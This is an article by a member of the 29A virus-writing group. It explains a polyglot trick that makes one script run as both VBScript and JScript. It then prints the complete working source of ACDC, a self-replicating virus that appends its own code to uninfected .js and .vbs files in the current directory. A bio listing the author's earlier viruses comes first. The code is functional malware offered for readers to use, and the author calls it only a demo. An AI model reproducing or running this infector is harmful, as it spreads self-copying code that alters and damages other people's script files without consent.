Cross-scripting attacks roy g biv / 29A Former DOS/Win16 virus writer, author of several virus families, including Ginger (see Coderz #1 zine for terrible buggy example, contact me for better sources ;), and Virus Bulletin 9/95 for a description of what they called Rainbow. Co-author of world's first virus using circular partition trick (Orsam, coded with Prototype in 1993). Designer of world's first XMS swapping virus (John Galt, coded by RT Fishel in 1995, only 30 bytes stub, the rest is swapped out). Author of world's first virus using Thread Local Storage for replication (Shrug, see Virus Bulletin 6/02 for a description, but they call it Chiton), world's first virus using Visual Basic 5/6 language extensions for replication (OU812), world's first Native executable virus (Chthon), world's first virus using process co-operation to prevent termination (Gemini, see Virus Bulletin 9/02 for a description), world's first virus using polymorphic SMTP headers (JunkMail, see Virus Bulletin 11/02 for a description), world's first viruses that can convert any data files to infectable objects (Pretext), world's first 32/64-bit parasitic EPO .NET virus (Croissant, see Virus Bulletin 11/04 for a description, but they call it Impanate), world's first virus using self-executing HTML (JunkHTMaiL, see Virus Bulletin 7/03 for a description), world's first virus for Win64 on Intel Itanium (Shrug, see Virus Bulletin 6/04 for a description, but they call it Rugrat), world's first virus for Win64 on AMD AMD64 (Shrug), world's first cross-infecting virus for Intel IA32 and AMD AMD64 (Shrug), and world's first viruses that infect Office applications and script files using the same code (Macaroni). Author of various retrovirus articles (eg see Vlad #7 for the strings that make your code invisible to TBScan). Went to sleep for a number of years. This is my fourth virus for VBScript and JScript. They are the world's first viruses that can infect both VBS and JScript using the same code. Question: VBScript or JScript? I often wondered if it would be possible to create a single script that could run on both platforms, but until now I could not think of a way to identify the platform or to protect against compiling errors. It happens that there is an easy way to do both of these things, and I found it. Answer: both The way that I found is so simple that I am surprised at myself that I did not find it sooner. First, we use the fact that VBScript will treat the "rem" statement as a comment and skip the rest of the line, but JScript will treat it as a variable reference. Second, we use the fact that JScript supports block comments bounded by /* and */ and will ignore everything between them. That's it. So VBScript starts with a "rem" comment, then becomes JScript code that begins by assigning a value to a variable called "rem", then the rest of the line is the rest of the JScript code. The line ends with the start of a block comment. The next line becomes the VBScript code which ends with another rem comment, which returns to JScript code, which ends the block comment. Let's see the code. The JScript must be a single line after the "rem=1;" but is reformatted here. rem=1; /*ACDC - roy g biv 25/02/05*/ a=new ActiveXObject("scripting.filesystemobject") b=a.opentextfile(WScript.scriptfullname).readall() b=b.substr(b.search(c=/rem=1/)) //remove everything before our code b=b.substr(0,b.lastIndexOf("*/")+2) //remove everything after our code for(d=new Enumerator(a.getfolder(".").files);!d.atEnd();d.moveNext()) //demo version, current directory only { f=a.getextensionname(e=d.item()).toLowerCase() if(f=="js"||f=="vbs")try { f=a.getfile(e) g=a.attributes f.attributes=0 if(a.opentextfile(e).readall().search(c)<0)a.opentextfile(e,8).write("\n"+b) //append ourselves if not infected already f.attributes=g } catch(z) { } } /* Next is VBScript code, which can be also single line if reformatted. on error resume next set a=createobject("scripting.filesystemobject") b=a.opentextfile(wscript.scriptfullname).readall c="rem=1" b=mid(b,instr(b,c)) 'remove everything before our code b=left(b,instrrev(b,"*"+"/")+1) 'remove everything after our code set d=a.getfolder(".") 'demo version, current directory only for each e in d.files f=lcase(a.getextensionname(e)) if f="js"or f="vbs"then f=a.attributes a.attributes=0 if instr(a.opentextfile(e).readall,c)=0then a.opentextfile(e,8).write vbcrlf+b 'append ourselves if not infected already a.attributes=f end if next rem*/ Greets to friendly people (A-Z): Active - Benny - Obleak - Prototype - Ratter - Ronin - RT Fishel - sars - The Gingerbread Man - Ultras - uNdErX - Vecna - VirusBuster - Whitehead rgb/29A feb 2005 iam_rgb@hotmail.com